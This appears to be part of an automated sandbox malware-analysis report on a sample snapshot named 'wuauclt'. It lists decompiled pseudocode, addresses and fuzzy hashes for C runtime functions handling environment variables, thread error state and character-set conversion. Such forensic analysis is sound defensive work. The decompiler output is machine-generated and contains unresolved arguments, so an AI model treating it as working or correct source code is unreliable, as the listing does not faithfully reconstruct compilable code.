                                                • Opcode Fuzzy Hash: 7a9502223ee78fa85b79f1ad18a6d767c3e51ca5d3b07209e652d8aadfab60e4
                                                • Instruction Fuzzy Hash: CE91B371E20A279EDF208E64CC85AEE7BA9AF09351F584599E805E7140DB75DCE0CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002604DC Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E002604DC(signed int _a4, signed int _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t68;
				signed int _t69;
				signed int _t73;
				signed int* _t75;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				signed int _t98;
				intOrPtr* _t99;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				void* _t119;
				signed int _t121;
				void* _t124;
				signed int _t125;
				signed int _t126;
				void* _t131;
				intOrPtr* _t135;
				signed int _t138;
				signed int _t140;
				void* _t141;
				void* _t142;
				signed int _t143;
				signed int _t145;
				signed int* _t146;
				signed int _t151;
				signed int _t152;
				CHAR* _t153;
				signed int _t154;
				signed int* _t155;
				signed int _t156;
				signed int _t158;
				void* _t163;
				void* _t165;
				void* _t166;

				_t111 = _a4;
				if(_t111 != 0) {
					_t143 = _t111;
					_t58 = E00267EE0(_t111, 0x3d);
					_v16 = _t58;
					_t119 = _t142;
					__eflags = _t58;
					if(_t58 == 0) {
						L10:
						 *((intOrPtr*)(E0025D495())) = 0x16;
						goto L11;
					} else {
						__eflags = _t58 - _t111;
						if(_t58 == _t111) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t58 + 1));
							_t151 =  *0x273a60; // 0x14be790
							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
							_v5 = _t62;
							__eflags = _t151 -  *0x273a6c; // 0x14be790
							if(__eflags == 0) {
								L44();
								_t151 = _t62;
								_t62 = _v5;
								_t119 = _t151;
								 *0x273a60 = _t151;
							}
							_t112 = 0;
							__eflags = _t151;
							if(_t151 != 0) {
								L21:
								_t121 = _t143;
								_t64 = _v16 - _t121;
								_push(_t64);
								_push(_t121);
								L61();
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 < 0) {
									L29:
									__eflags = _v5 - _t112;
									if(_v5 != _t112) {
										goto L12;
									} else {
										_t65 =  ~_t64;
										_v12 = _t65;
										_t27 = _t65 + 2; // 0x2
										_t124 = _t27;
										__eflags = _t124 - _t65;
										if(_t124 < _t65) {
											goto L11;
										} else {
											__eflags = _t124 - 0x3fffffff;
											if(_t124 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t124);
												_t152 = E00261204(_t151);
												E0025D2F4(_t112);
												_t165 = _t165 + 0x10;
												__eflags = _t152;
												if(_t152 == 0) {
													goto L11;
												} else {
													_t125 = _v12;
													_t143 = _t112;
													_t68 = _a4;
													 *(_t152 + _t125 * 4) = _t68;
													 *(_t152 + 4 + _t125 * 4) = _t112;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t151 - _t112;
									if( *_t151 == _t112) {
										goto L29;
									} else {
										E0025D2F4( *((intOrPtr*)(_t151 + _t64 * 4)));
										_t140 = _v12;
										__eflags = _v5 - _t112;
										if(_v5 != _t112) {
											while(1) {
												__eflags =  *(_t151 + _t140 * 4) - _t112;
												if( *(_t151 + _t140 * 4) == _t112) {
													break;
												}
												 *(_t151 + _t140 * 4) =  *(_t151 + 4 + _t140 * 4);
												_t140 = _t140 + 1;
												__eflags = _t140;
											}
											_push(4);
											_push(_t140);
											_t152 = E00261204(_t151);
											E0025D2F4(_t112);
											_t165 = _t165 + 0x10;
											_t68 = _t143;
											__eflags = _t152;
											if(_t152 != 0) {
												L34:
												 *0x273a60 = _t152;
											}
										} else {
											_t68 = _a4;
											_t143 = _t112;
											 *(_t151 + _t140 * 4) = _t68;
										}
										__eflags = _a8 - _t112;
										if(_a8 == _t112) {
											goto L12;
										} else {
											_t126 = _t68;
											_t141 = _t126 + 1;
											do {
												_t69 =  *_t126;
												_t126 = _t126 + 1;
												__eflags = _t69;
											} while (_t69 != 0);
											_v12 = _t126 - _t141 + 2;
											_t153 = E0025D3BF(_t126 - _t141, _t126 - _t141 + 2, 1);
											_pop(_t129);
											__eflags = _t153;
											if(_t153 == 0) {
												L42:
												E0025D2F4(_t153);
												goto L12;
											} else {
												_t73 = E0025BAB2(_t153, _v12, _a4);
												_t166 = _t165 + 0xc;
												__eflags = _t73;
												if(_t73 != 0) {
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													_push(_t112);
													E0025BA7F();
													asm("int3");
													_t163 = _t166;
													_push(_t143);
													_t145 = _v44;
													__eflags = _t145;
													if(_t145 != 0) {
														_t131 = 0;
														_t75 = _t145;
														__eflags =  *_t145;
														if( *_t145 != 0) {
															do {
																_t75 =  &(_t75[1]);
																_t131 = _t131 + 1;
																__eflags =  *_t75;
															} while ( *_t75 != 0);
														}
														_t47 = _t131 + 1; // 0x2
														_t154 = E0025D3BF(_t131, _t47, 4);
														_t133 = _t153;
														__eflags = _t154;
														if(_t154 == 0) {
															L59:
															E0025D37C(_t112, _t133, _t141, _t145, _t154);
															goto L60;
														} else {
															__eflags =  *_t145;
															if( *_t145 == 0) {
																L57:
																E0025D2F4(0);
																_t86 = _t154;
																goto L58;
															} else {
																_push(_t112);
																_t112 = _t154 - _t145;
																__eflags = _t112;
																do {
																	_t135 =  *_t145;
																	_t48 = _t135 + 1; // 0x5
																	_t141 = _t48;
																	do {
																		_t87 =  *_t135;
																		_t135 = _t135 + 1;
																		__eflags = _t87;
																	} while (_t87 != 0);
																	_t49 = _t135 - _t141 + 1; // 0x6
																	_v12 = _t49;
																	 *(_t112 + _t145) = E0025D3BF(_t135 - _t141, _t49, 1);
																	E0025D2F4(0);
																	_t166 = _t166 + 0xc;
																	__eflags =  *(_t112 + _t145);
																	if( *(_t112 + _t145) == 0) {
																		goto L59;
																	} else {
																		_t91 = E0025BAB2( *(_t112 + _t145), _v12,  *_t145);
																		_t166 = _t166 + 0xc;
																		__eflags = _t91;
																		if(_t91 != 0) {
																			L60:
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			_push(0);
																			E0025BA7F();
																			asm("int3");
																			_push(_t163);
																			_push(_t112);
																			_push(_t154);
																			_push(_t145);
																			_t146 =  *0x273a60; // 0x14be790
																			_t155 = _t146;
																			__eflags =  *_t146;
																			if( *_t146 == 0) {
																				L67:
																				_t156 = _t155 - _t146;
																				__eflags = _t156;
																				_t158 =  ~(_t156 >> 2);
																			} else {
																				_t115 = _v0;
																				do {
																					_t82 = E00264A03(_v4,  *_t155, _t115);
																					_t166 = _t166 + 0xc;
																					__eflags = _t82;
																					if(_t82 != 0) {
																						goto L66;
																					} else {
																						_t84 =  *((intOrPtr*)(_t115 +  *_t155));
																						__eflags = _t84 - 0x3d;
																						if(_t84 == 0x3d) {
																							L69:
																							_t158 = _t155 - _t146 >> 2;
																						} else {
																							__eflags = _t84;
																							if(_t84 == 0) {
																								goto L69;
																							} else {
																								goto L66;
																							}
																						}
																					}
																					goto L68;
																					L66:
																					_t155 =  &(_t155[1]);
																					__eflags =  *_t155;
																				} while ( *_t155 != 0);
																				goto L67;
																			}
																			L68:
																			return _t158;
																		} else {
																			goto L55;
																		}
																	}
																	goto L70;
																	L55:
																	_t145 = _t145 + 4;
																	__eflags =  *_t145 - _t91;
																} while ( *_t145 != _t91);
																goto L57;
															}
														}
													} else {
														_t86 = 0;
														L58:
														return _t86;
													}
												} else {
													_t138 = _v16 + 1 + _t153 - _a4;
													asm("sbb eax, eax");
													 *(_t138 - 1) = _t112;
													_t98 = SetEnvironmentVariableA(_t153,  !( ~(_v5 & 0x000000ff)) & _t138);
													__eflags = _t98;
													if(_t98 == 0) {
														_t99 = E0025D495();
														_t112 = _t112 | 0xffffffff;
														__eflags = _t112;
														 *_t99 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t62;
									if(_t62 == 0) {
										 *0x273a60 = E0025D3BF(_t119, 1, 4);
										E0025D2F4(_t112);
										_t151 =  *0x273a60; // 0x14be790
										_t165 = _t165 + 0xc;
										__eflags = _t151;
										if(_t151 == 0) {
											goto L11;
										} else {
											__eflags =  *0x273a64 - _t112; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x273a64 = E0025D3BF(_t119, 1, 4);
												E0025D2F4(_t112);
												_t165 = _t165 + 0xc;
												__eflags =  *0x273a64 - _t112; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t112 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x273a64 - _t112; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t108 = L0025C6EC(0);
										__eflags = _t108;
										if(_t108 != 0) {
											L19:
											_t151 =  *0x273a60; // 0x14be790
											L20:
											__eflags = _t151;
											if(_t151 == 0) {
												L11:
												_t112 = _t111 | 0xffffffff;
												__eflags = _t112;
												L12:
												E0025D2F4(_t143);
												_t61 = _t112;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E0025D495();
					 *_t109 = 0x16;
					_t61 = _t109 | 0xffffffff;
					L13:
					return _t61;
				}
				L70:
			}


























































                                                0x002604e5
                                                0x002604ea
                                                0x00260501
                                                0x00260503
                                                0x00260508
                                                0x0026050c
                                                0x0026050d
                                                0x0026050f
                                                0x0026055f
                                                0x00260564
                                                0x00000000
                                                0x00260511
                                                0x00260511
                                                0x00260513
                                                0x00000000
                                                0x00260515
                                                0x00260515
                                                0x00260519
                                                0x0026051f
                                                0x00260522
                                                0x00260525
                                                0x0026052b
                                                0x0026052e
                                                0x00260533
                                                0x00260535
                                                0x00260538
                                                0x00260539
                                                0x00260539
                                                0x0026053f
                                                0x00260541
                                                0x00260543
                                                0x002605d7
                                                0x002605da
                                                0x002605dc
                                                0x002605de
                                                0x002605df
                                                0x002605e0
                                                0x002605e5
                                                0x002605ea
                                                0x002605ec
                                                0x00260636
                                                0x00260636
                                                0x00260639
                                                0x00000000
                                                0x0026063f
                                                0x0026063f
                                                0x00260641
                                                0x00260644
                                                0x00260644
                                                0x00260647
                                                0x00260649
                                                0x00000000
                                                0x0026064f
                                                0x0026064f
                                                0x00260655
                                                0x00000000
                                                0x0026065b
                                                0x0026065b
                                                0x0026065d
                                                0x00260665
                                                0x00260667
                                                0x0026066c
                                                0x0026066f
                                                0x00260671
                                                0x00000000
                                                0x00260677
                                                0x00260677
                                                0x0026067a
                                                0x0026067c
                                                0x0026067f
                                                0x00260682
                                                0x00000000
                                                0x00260682
                                                0x00260671
                                                0x00260655
                                                0x00260649
                                                0x002605ee
                                                0x002605ee
                                                0x002605f0
                                                0x00000000
                                                0x002605f2
                                                0x002605f5
                                                0x002605fb
                                                0x002605fe
                                                0x00260601
                                                0x00260615
                                                0x00260615
                                                0x00260618
                                                0x00000000
                                                0x00000000
                                                0x00260611
                                                0x00260614
                                                0x00260614
                                                0x00260614
                                                0x0026061a
                                                0x0026061c
                                                0x00260624
                                                0x00260626
                                                0x0026062b
                                                0x0026062e
                                                0x00260630
                                                0x00260632
                                                0x00260686
                                                0x00260686
                                                0x00260686
                                                0x00260603
                                                0x00260603
                                                0x00260606
                                                0x00260608
                                                0x00260608
                                                0x0026068c
                                                0x0026068f
                                                0x00000000
                                                0x00260695
                                                0x00260695
                                                0x00260697
                                                0x0026069a
                                                0x0026069a
                                                0x0026069c
                                                0x0026069d
                                                0x0026069d
                                                0x002606a9
                                                0x002606b1
                                                0x002606b4
                                                0x002606b5
                                                0x002606b7
                                                0x00260700
                                                0x00260701
                                                0x00000000
                                                0x002606b9
                                                0x002606c0
                                                0x002606c5
                                                0x002606c8
                                                0x002606ca
                                                0x0026070c
                                                0x0026070d
                                                0x0026070e
                                                0x0026070f
                                                0x00260710
                                                0x00260711
                                                0x00260716
                                                0x0026071a
                                                0x0026071d
                                                0x0026071e
                                                0x00260721
                                                0x00260723
                                                0x0026072c
                                                0x0026072e
                                                0x00260730
                                                0x00260732
                                                0x00260734
                                                0x00260734
                                                0x00260737
                                                0x00260738
                                                0x00260738
                                                0x00260734
                                                0x0026073e
                                                0x00260749
                                                0x0026074c
                                                0x0026074d
                                                0x0026074f
                                                0x002607b6
                                                0x002607b6
                                                0x00000000
                                                0x00260751
                                                0x00260751
                                                0x00260754
                                                0x002607a6
                                                0x002607a8
                                                0x002607ae
                                                0x00000000
                                                0x00260756
                                                0x00260756
                                                0x00260759
                                                0x00260759
                                                0x0026075b
                                                0x0026075b
                                                0x0026075d
                                                0x0026075d
                                                0x00260760
                                                0x00260760
                                                0x00260762
                                                0x00260763
                                                0x00260763
                                                0x0026076b
                                                0x0026076f
                                                0x00260779
                                                0x0026077c
                                                0x00260781
                                                0x00260784
                                                0x00260788
                                                0x00000000
                                                0x0026078a
                                                0x00260792
                                                0x00260797
                                                0x0026079a
                                                0x0026079c
                                                0x002607bb
                                                0x002607bd
                                                0x002607be
                                                0x002607bf
                                                0x002607c0
                                                0x002607c1
                                                0x002607c2
                                                0x002607c7
                                                0x002607ca
                                                0x002607cd
                                                0x002607ce
                                                0x002607cf
                                                0x002607d0
                                                0x002607d6
                                                0x002607d8
                                                0x002607db
                                                0x00260807
                                                0x00260807
                                                0x00260807
                                                0x0026080c
                                                0x002607dd
                                                0x002607dd
                                                0x002607e0
                                                0x002607e6
                                                0x002607eb
                                                0x002607ee
                                                0x002607f0
                                                0x00000000
                                                0x002607f2
                                                0x002607f4
                                                0x002607f7
                                                0x002607f9
                                                0x00260815
                                                0x00260817
                                                0x002607fb
                                                0x002607fb
                                                0x002607fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002607fd
                                                0x002607f9
                                                0x00000000
                                                0x002607ff
                                                0x002607ff
                                                0x00260802
                                                0x00260802
                                                0x00000000
                                                0x002607e0
                                                0x0026080e
                                                0x00260814
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0026079c
                                                0x00000000
                                                0x0026079e
                                                0x0026079e
                                                0x002607a1
                                                0x002607a1
                                                0x00000000
                                                0x002607a5
                                                0x00260754
                                                0x00260725
                                                0x00260725
                                                0x002607b1
                                                0x002607b5
                                                0x002607b5
                                                0x002606cc
                                                0x002606d5
                                                0x002606dd
                                                0x002606e1
                                                0x002606e8
                                                0x002606ee
                                                0x002606f0
                                                0x002606f2
                                                0x002606f7
                                                0x002606f7
                                                0x002606fa
                                                0x002606fa
                                                0x00000000
                                                0x002606f0
                                                0x002606ca
                                                0x002606b7
                                                0x0026068f
                                                0x002605f0
                                                0x00260549
                                                0x00260549
                                                0x0026054c
                                                0x0026057d
                                                0x0026057d
                                                0x0026057f
                                                0x0026058f
                                                0x00260594
                                                0x00260599
                                                0x0026059f
                                                0x002605a2
                                                0x002605a4
                                                0x00000000
                                                0x002605a6
                                                0x002605a6
                                                0x002605ac
                                                0x00000000
                                                0x002605ae
                                                0x002605b8
                                                0x002605bd
                                                0x002605c2
                                                0x002605c5
                                                0x002605cb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002605cb
                                                0x002605ac
                                                0x00260581
                                                0x00260581
                                                0x00000000
                                                0x00260581
                                                0x0026054e
                                                0x0026054e
                                                0x00260554
                                                0x00000000
                                                0x00260556
                                                0x00260556
                                                0x0026055b
                                                0x0026055d
                                                0x002605cd
                                                0x002605cd
                                                0x002605d3
                                                0x002605d3
                                                0x002605d5
                                                0x0026056a
                                                0x0026056a
                                                0x0026056a
                                                0x0026056d
                                                0x0026056e
                                                0x00260575
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0026055d
                                                0x00260554
                                                0x0026054c
                                                0x00260543
                                                0x00260513
                                                0x002604ec
                                                0x002604ec
                                                0x002604f1
                                                0x002604f7
                                                0x00260578
                                                0x0026057c
                                                0x0026057c
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                • String ID:
                                                • API String ID: 1282221369-0
                                                • Opcode ID: 70f1f7cf3f44d15afff04cdb9a809f6be8f59f3aee00a58781483b042a9de6d5
                                                • Instruction ID: c8755a46e7c419683657049344e3dcbcb6106e4a68b3316b638c247d03292cae
                                                • Opcode Fuzzy Hash: 70f1f7cf3f44d15afff04cdb9a809f6be8f59f3aee00a58781483b042a9de6d5
                                                • Instruction Fuzzy Hash: 00616B71924312AFDB21EF6898C276F77A4BF00310F54056DED4697281EB319AE0DF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025E966 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E0025E966(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x272524; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0025D3BF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0025D74F(_t25, __eflags,  *0x272524, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E0025E7D8(_t25, _t31, "(%'");
							E0025D2F4(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E0025D2F4();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E0025D37C(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x272524; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0025D3BF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0025D74F(_t27, __eflags,  *0x272524, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E0025E7D8(_t27, _t32, "(%'");
									E0025D2F4(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E0025D2F4();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0025D6F9(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0025D6F9(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                0x0025e966
                                                0x0025e966
                                                0x0025e966
                                                0x0025e970
                                                0x0025e972
                                                0x0025e977
                                                0x0025e97a
                                                0x0025e988
                                                0x0025e98f
                                                0x0025e994
                                                0x0025e997
                                                0x0025e99a
                                                0x0025e9ac
                                                0x0025e9b1
                                                0x0025e9b3
                                                0x0025e9be
                                                0x0025e9c5
                                                0x0025e9ca
                                                0x0025e9cd
                                                0x0025e9cf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025e9b5
                                                0x0025e9b5
                                                0x00000000
                                                0x0025e9b5
                                                0x0025e99c
                                                0x0025e99c
                                                0x0025e99d
                                                0x0025e99d
                                                0x0025e9a2
                                                0x0025e9dd
                                                0x0025e9de
                                                0x0025e9e4
                                                0x0025e9e9
                                                0x0025e9ec
                                                0x0025e9ed
                                                0x0025e9ee
                                                0x0025e9f5
                                                0x0025e9f7
                                                0x0025e9f9
                                                0x0025e9fe
                                                0x0025ea01
                                                0x0025ea0f
                                                0x0025ea1b
                                                0x0025ea1e
                                                0x0025ea21
                                                0x0025ea33
                                                0x0025ea38
                                                0x0025ea3a
                                                0x0025ea45
                                                0x0025ea4b
                                                0x0025ea53
                                                0x0025ea55
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ea3c
                                                0x0025ea3c
                                                0x00000000
                                                0x0025ea3c
                                                0x0025ea23
                                                0x0025ea23
                                                0x0025ea24
                                                0x0025ea24
                                                0x0025ea57
                                                0x0025ea58
                                                0x0025ea58
                                                0x0025ea03
                                                0x0025ea09
                                                0x0025ea0d
                                                0x0025ea60
                                                0x0025ea61
                                                0x0025ea67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ea0d
                                                0x0025ea6e
                                                0x0025ea6e
                                                0x0025e97c
                                                0x0025e982
                                                0x0025e986
                                                0x0025e9d1
                                                0x0025e9d2
                                                0x0025e9dc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025e986

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID: (%'
                                                • API String ID: 3160817290-2229709766
                                                • Opcode ID: 3acf0f419d710b28f177e8d6735b90f222e1f4f729ab77d287fa989ae5c26a24
                                                • Instruction ID: 28f5f36057f9ae4f4b9ff9823e2c4cb1974ff833b2c6b3d98cb8f9489f142ea1
                                                • Opcode Fuzzy Hash: 3acf0f419d710b28f177e8d6735b90f222e1f4f729ab77d287fa989ae5c26a24
                                                • Instruction Fuzzy Hash: AAF049721646116ADA6A37347D0AF5E226E4BD1323F220020FC18D2191EF70896E895D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002627D8 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E002627D8(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x271004; // 0x80aab37c
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00264F92(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t104);
					return E00257097(_v8 ^ _t106, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00260E53(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0025D80A(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00260E53(_t101);
									goto L36;
								}
								_t62 = E0025D80A(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00260E53(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0025D32E(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E002676E0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0025D80A(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0025D32E(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E002676E0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}




























                                                0x002627dd
                                                0x002627de
                                                0x002627df
                                                0x002627e6
                                                0x002627eb
                                                0x002627f1
                                                0x002627f7
                                                0x002627fd
                                                0x00262800
                                                0x00262800
                                                0x00262803
                                                0x00262805
                                                0x00262805
                                                0x00262803
                                                0x00262807
                                                0x0026280c
                                                0x00262813
                                                0x00262816
                                                0x00262816
                                                0x00262832
                                                0x00262838
                                                0x0026283d
                                                0x002629d0
                                                0x002629d4
                                                0x002629e3
                                                0x00262843
                                                0x00262843
                                                0x00262846
                                                0x0026284b
                                                0x0026284f
                                                0x002628a3
                                                0x002628a3
                                                0x002628a5
                                                0x002628a7
                                                0x002629c5
                                                0x002629c5
                                                0x002629c7
                                                0x002629c8
                                                0x00000000
                                                0x002629ce
                                                0x002628b8
                                                0x002628be
                                                0x002628c0
                                                0x00000000
                                                0x00000000
                                                0x002628c6
                                                0x002628d8
                                                0x002628dd
                                                0x002628e1
                                                0x00000000
                                                0x00000000
                                                0x002628ee
                                                0x00262928
                                                0x0026292b
                                                0x0026292e
                                                0x00262930
                                                0x00262932
                                                0x00262934
                                                0x00262980
                                                0x00262980
                                                0x00262982
                                                0x00262982
                                                0x00262984
                                                0x002629be
                                                0x002629bf
                                                0x00000000
                                                0x002629c4
                                                0x00262998
                                                0x0026299d
                                                0x0026299f
